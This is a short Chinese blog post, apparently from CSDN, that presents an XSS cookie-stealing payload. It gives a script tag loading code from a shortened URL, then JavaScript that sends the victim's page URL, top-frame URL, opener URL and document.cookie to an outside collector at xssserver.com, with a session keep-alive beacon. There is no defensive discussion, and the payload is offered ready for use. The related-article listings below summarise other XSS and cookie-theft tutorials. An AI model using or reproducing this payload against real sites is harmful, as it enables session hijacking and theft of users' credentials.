xss攻击获取站点信息以及对应的cookie的脚本

最新推荐文章于 2024-04-27 18:10:30 发布
最新推荐文章于 2024-04-27 18:10:30 发布
阅读量513 收藏
点赞数
分类专栏: JavaScript 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kalogen/article/details/84743397
版权

<script src=http://is.gd/L1PtPA></script>

 

========

JS代码如下:

========

(function(){(new Image()).src='http://www.xssserver.com/index.php?do=api&id=P0cbrY&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://www.xssserver.com/index.php?do=keepsession&id=P0cbrY&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

kalogen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常见的Web攻击方式:SQL注入、XSS跨站脚本攻击、CSRF跨站点请求伪造
学习
07-07 6974
常见的Web攻击有SQL注入、XSS跨站脚本攻击、跨站点请求伪造共三类,下面分别简单介绍。 1 SQL注入 1.1 原理        SQL注入就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。SQL注入漏洞到底是以怎样的形式进行攻击的呢,接下来将以一个简单的实例来进行介绍。   &...
pikachu-XSS(跨站脚本攻击
a1245678899的博客
11-09 1147
XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容 被当成正常的HTML来执行(类似于SQL注入),从而产生危害。造成DOM型XSS的原因是前端的输入被DOM给获取到了,通过DOM又在前端输出,跟反射型和存储型比起来,它是不经过后台交互的。存储型XSS和反射型XSS形成的原因是一样的,不同的是存储型XSS攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害。编码,后台过滤了特殊字符,比如标签,但该标签可以被各种编码,后台不一定过。
XSS获取COOKIE
04-20
XSS获取COOKIE
获取cookie脚本
weixin_30914981的博客
08-22 577
Create Http Context ${server} scheme=http Set Request Header User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743...
js 操作 cookie脚本
青蛙king的博客
06-16 477
var CookieUtil = { get: function(name){ var cookieName = encodeURIComponent(name) + "=", cookieStart = document.cookie.indexOf(cookieName), cookieValue = null; if(cookieStart > -1){ var cookieEnd .
xss文件页面内容读取(解决)
09-05
xss文件页面内容读取(解决),需要的朋友可以参考下。
XSS跨站脚本攻击之——XSS平台搭建与——Cookie获取
温柔小薛的博客
04-05 1077
XSS平台搭建及Cookie获取 准备工作 利用pikachuXSS后台 pikachu\pkxss\inc目录下的config.inc.php 修改mysql用户名密码 登录后台 pikachu\pkxss\xcookie目录解读 cookie.php 获取cookie的API页面并存到攻击者平台数据库中 获取完后才能重定向一个可信网站,起到迷惑用户隐藏攻击过程的作用 ...
XSS (跨站脚本攻击) 分析与实战
a10534126的博客
02-23 1687
文章目录 一、漏洞原理 1、XSS简介: 2、XSS原理解析: 3、XSS的分类: 3.1、反射型XSS 3.2、存储型XSS 3.3、DOM型XSS 二、靶场实战 XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安
WEB漏洞篇——跨站脚本攻击XSS
m0_56634355的博客
06-05 4714
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
网络安全基础技术扫盲篇 — 常见web漏洞之XSS跨站脚本攻击
最新发布
2401_84301853的博客
04-27 811
知识宝库在此藏,一键关注获宝藏首先我们了解一下原理,用一句话概括就是。在Web应用中,前端代码主要包括HTML、CSS和JavaScript。:HTML 用于描述网页的结构和内容,包括标签、元素、属性等。前端骨架(有很大关系,但不是该漏洞的利用核心)。:CSS用于定义网页的样式和布局。美化作用(和渗透关系不大):JavaScript是一种客户端脚本语言,用于实现动态效果和与用户的交互。恶意的JavaScript代码可以直接在用户的浏览器中执行,导致XSS攻击的发生。
XSS攻击获取用户的cookie(get方式)
weixin_43726152的博客
05-06 4009
关于XSS攻击是什么,想必大家都知道了,今天围绕百度随便找的一张流程图来完成一个获取用户的cookieXSS实验。 为了和上图数字一致好看些,从序号1开始吧 0x1 用户登入 自行登入。坑自己就可以了,不要坑别人哈。 0x2 找到漏洞点,制作一个危险的url 让前端插入的js是: <script>document.location = 'http://127.0.0.1/pik...
cookie获取xss
baidu_41942652的博客
04-28 456
首先打开pikachu平台,找到反射型xss(get)章节。 打开后台 登录账号 将字数限制去掉 然后输入一个的script语句 然后可以在后台看见用户访问的cookie信息 这样一次cookie获取就成功了! ...
XSS攻击
continue my dream
09-04 2551
背景知识 1.1 什么是XSS攻击   XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本攻击者利
6.5 XSS 获取 Cookie 攻击
qq_55202378的博客
08-20 1493
XSS获取Cookie
xss脚本攻击获取用户cookie信息存储到本地
Lancis的博客
07-09 481
首先准备一个获取cookie的asp脚本 <html> <title>test</title> <body> <%testfile = Server.MapPath("code.txt") msg = Request("msg") set fs = server.CreateObject("scripting.filesystemobject") set thisfile = fs.OpenTextFile(testfile,8,True,0) th
xss跨站攻击详讲 | 如何利用xss拿下一个站?
向阳-Y.的博客
11-13 1万+
1.初识xxs跨站漏洞: xss能干什么? 利用xss获取对方后台地址cookie信息,得到cookie和后台地址后,能通过相关工具(比如postman)进行后台登录: 其他补充: cookie :一般用于小中型网站,一般存储在自己电脑上,存活时间较长 session:采用会话模式,一般用于大型网站,一存储在服务器上,存活时间较短 2.xss的类型 2.1反射型 当在网页插入下列xss代码后,会立即回馈到屏幕,但这条xss代码并不会一直存储到该网站上 <script>alert(1)&
XSS攻击的简单实现
热门推荐
hxxjxw的博客
04-28 2万+
xss 跨站脚本攻击(Cross Site Script) ①在慕课网跟着教学视频自己编写一个网页 ,用这个网页模拟有XSS漏洞的网站。 在网页源码中插入了这样一句话。 这句话的作用其实是:显示一个搜索框。将搜索框中显示的内容是你用户输入之后的内容。 通过看网站源码,我们可以知道,他让用户在显示框输入一个内容,然后就把这个内容当做显示框内容显示。 ...
xss跨站脚本攻击
weixin_42374938的博客
08-13 243
xss是一种在客户端利用JavaScript脚本获取敏感信息攻击行为。
XSS漏洞的利用
LizePing_的博客
07-29 5000
XSS的利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookiexss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
XSS攻击详解:跨站脚本危害与类型分析
"xss跨站脚本攻击-运维安全详细笔记" XSS(Cross-site scripting)跨站脚本攻击是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证和过滤用户输入的情况。攻击者通过在网页上注入恶意脚本,使得其他用户在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值